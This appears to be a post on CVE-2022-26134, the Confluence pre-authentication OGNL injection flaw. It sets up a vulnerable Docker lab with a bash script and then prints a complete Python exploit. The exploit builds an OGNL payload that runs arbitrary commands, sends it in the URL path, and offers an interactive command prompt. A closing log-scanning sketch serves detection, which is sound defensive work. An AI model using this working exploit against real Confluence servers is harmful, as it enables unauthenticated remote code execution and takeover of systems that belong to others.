Description
Confluence is a web-based corporate wiki developed by Australian software company Atlassian.
On June 02, 2022, Atlassian released a security advisory for its Confluence Server and Data Center applications, highlighting a critical-severity unauthenticated remote code execution vulnerability. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.
GitHub - whokilleddb/CVE-2022-26134-Confluence-RCE: Exploit for CVE-2022-26134: Confluence Pre-Auth Remote Code Execution via OGNL Injection (github.com)
start_confluence.sh
Bash:
#!/bin/bash

# Specify Color Schemes
NONE='\033[00m'
RED='\033[01;31m'
GREEN='\033[01;32m'
YELLOW='\033[01;33m'
BLUE='\033[01;34m'
MAGENTA='\033[01;35m'
CYAN='\033[01;36m'
WHITE='\033[01;37m'
BOLD='\033[1m'
BLINK='\033[5m'
UNDERLINE='\033[4m'

# Globals
CONTAINER_ID=""
CONTAINER_IP=""

init(){
    # Set up environment before starting containers
    echo -e "${BOLD}${MAGENTA}[+] Setting Up Environment ${NONE}"

    # Check if program is being run as root
    if [[ $EUID -ne 0 ]]; then
        echo -e "${BOLD}${RED}[!] This script must be run as ROOT!${NONE}" 1>&2
        exit 1
    fi

    # Start Docker
    echo -e "${BOLD}${CYAN}[i] Starting Docker${NONE}"
    if systemctl start docker; then
        echo -e "${BOLD}${GREEN}[+] Successfully Started Docker${NONE}"
    else
        echo -e "${BOLD}${RED}[!] Failed to start Docker${NONE}"
        exit 2
    fi
}

fetch_compose(){
    # Download the vulhub compose file for the vulnerable lab instance
    echo -e "${BOLD}${YELLOW}[i] Setup Guide: https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134${NONE}"
    echo -e "${BOLD}${CYAN}[i] Fetching Docker Compose${BLUE}"
    rm -f docker-compose.yml
    wget https://raw.githubusercontent.com/vulhub/vulhub/master/confluence/CVE-2022-26134/docker-compose.yml
}

setup(){
    # Tear down any previous lab, then rebuild and start it
    echo -e "${BOLD}${MAGENTA}[i] Stopping Containers If Any${NONE}"
    DOCKER_BUILDKIT=1 docker-compose down -v
    echo -e "${BOLD}${BLUE}[i] Building Images${NONE}"
    DOCKER_BUILDKIT=1 docker-compose build
    echo -e "${BOLD}${GREEN}[+] Starting containers${NONE}"
    DOCKER_BUILDKIT=1 docker-compose up -d
}

setup_confluence(){
    # Find the Confluence container and prepare its home directory
    CONTAINER_ID=$(docker ps | grep 'conflu' | cut -d ' ' -f1)
    docker exec -it "$CONTAINER_ID" sh -c "mkdir /home/confluence"
    docker exec -it "$CONTAINER_ID" sh -c "chown -R confluence:confluence /home/confluence"
    docker exec -it "$CONTAINER_ID" sh -c "apt update -y && apt install -y netcat"
}

main() {
    init
    fetch_compose
    setup
    setup_confluence
    echo -e "${BOLD}${GREEN}[+] Done!${NONE}"
}

main
confluence-exploit.py
Python:
#!/usr/bin/env python3
import sys
import urllib3
import requests
import argparse
from requests.exceptions import InvalidSchema
from rich import print
from rich.prompt import Prompt
from urllib.parse import quote

# Disable SSL Warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Save options in a global dict
opt = dict()


def gen_payload(cmd: str):
    """Generate Payload for RCE"""
    payload = '${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("' + cmd + '").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}'
    payload = quote(payload)
    return payload


def check_args(cmd_args):
    """Check command line arguments for any sort of funny business"""
    # Start with checking the URL
    try:
        resp = requests.get(cmd_args.url, verify=False)
        if resp.ok:
            opt['url'] = cmd_args.url
        else:
            raise resp.raise_for_status()
    except requests.exceptions.RequestException as e:
        print(":x:", f"[bold][red]Exception occurred as:[/bold][/red] {e}", file = sys.stderr)
        sys.exit(-1)

    # Just print the arguments after parsing
    print(":link:", f"[bold]URL:[/bold] {opt['url']}")


def run_cmd(cmd):
    # The encoded expression is sent as a URL path segment
    payload = gen_payload(cmd)
    url = opt['url'] + '/' + payload + '/'
    try:
        resp = requests.get(url, timeout=5, verify=False, allow_redirects=False)
        # Command output comes back in a custom response header
        if 'X-Cmd-Response' not in resp.headers:
            print(":x:", "Could not find the Response Headers", file = sys.stderr)
            return 0
        print(resp.headers['X-Cmd-Response'])
        return 1
    except requests.exceptions.RequestException:
        print(":x:", "Request failed :(", file = sys.stderr)
        return -1


def start_prompt():
    """Start An Interactive Prompt"""
    try:
        while True:
            cmd = Prompt.ask(":point_right:", default="id")
            if (cmd.lower() == "quit" or cmd.lower() == "exit"):
                sys.exit(0)
            run_cmd(cmd)
    except KeyboardInterrupt:
        print()
        print(":x:", "[bold][red]Exiting![/red][/bold]")
        sys.exit(0)


def main():
    """Main Function"""
    parser = argparse.ArgumentParser(description="[+] Confluence Pre-Auth Remote Code Execution via OGNL Injection Exploit")
    parser.add_argument('-u', '--url', required=True,
                        help = "Base URL")
    check_args(parser.parse_args())
    start_prompt()


if __name__ == '__main__':
    main()
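The script above sends its OGNL expression as a percent-encoded `${...}` URL path segment, so a reverse-proxy or Tomcat access log is a natural place to look for it. The following detection sketch is an added example, not part of the original post or the linked repository; the combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line of a combined-format access log entry (log format is an assumption)
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# OGNL expression delimiters ${...} / %{...} and tokens typical of OGNL calls
OGNL_RE = re.compile(r'[$%]\{.*\}', re.DOTALL)
OGNL_TOKENS = ("@java.lang.", "getRuntime", "ServletActionContext", "(#")


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode several times so double-encoded paths are normalised."""
    for _ in range(rounds):
        value = unquote(value)
    return value


def classify(line: str) -> str:
    """Return 'ognl-exec', 'ognl-probe' or 'clean' for one access-log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return "clean"
    # Only the path is inspected, since the request on this page carries the expression there
    path = decode_fully(match.group("target").split("?", 1)[0])
    if not OGNL_RE.search(path):
        return "clean"
    return "ognl-exec" if any(t in path for t in OGNL_TOKENS) else "ognl-probe"


# Constructed sample lines (documentation IP ranges, truncated non-working expressions)
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Jun/2022:10:01:02 +0000] "GET /login.action HTTP/1.1" 200 7211',
    '203.0.113.7 - - [03/Jun/2022:10:01:05 +0000] "GET /%24%7B%28%23a%3D%40java.lang.Runtime%40getRuntime%28%29%29%7D/ HTTP/1.1" 302 0',
    '203.0.113.9 - - [03/Jun/2022:10:02:11 +0000] "GET /%2524%257Bx%257D/ HTTP/1.1" 302 0',
    '198.51.100.4 - - [03/Jun/2022:10:03:40 +0000] "GET /pages/viewpage.action?pageId=1&q=%24%7Bx%7D HTTP/1.1" 200 512',
]


def scan(lines):
    """Return (verdict, source_ip) for every line that is not clean."""
    hits = [(classify(line), line.split(" ", 1)[0]) for line in lines]
    return [hit for hit in hits if hit[0] != "clean"]


if __name__ == "__main__":
    for verdict, ip in scan(SAMPLE_LOG):
        print(f"{verdict:10} {ip}")
```

Where response headers are logged, the `X-Cmd-Response` header set by the payload on this page is a second indicator worth alerting on.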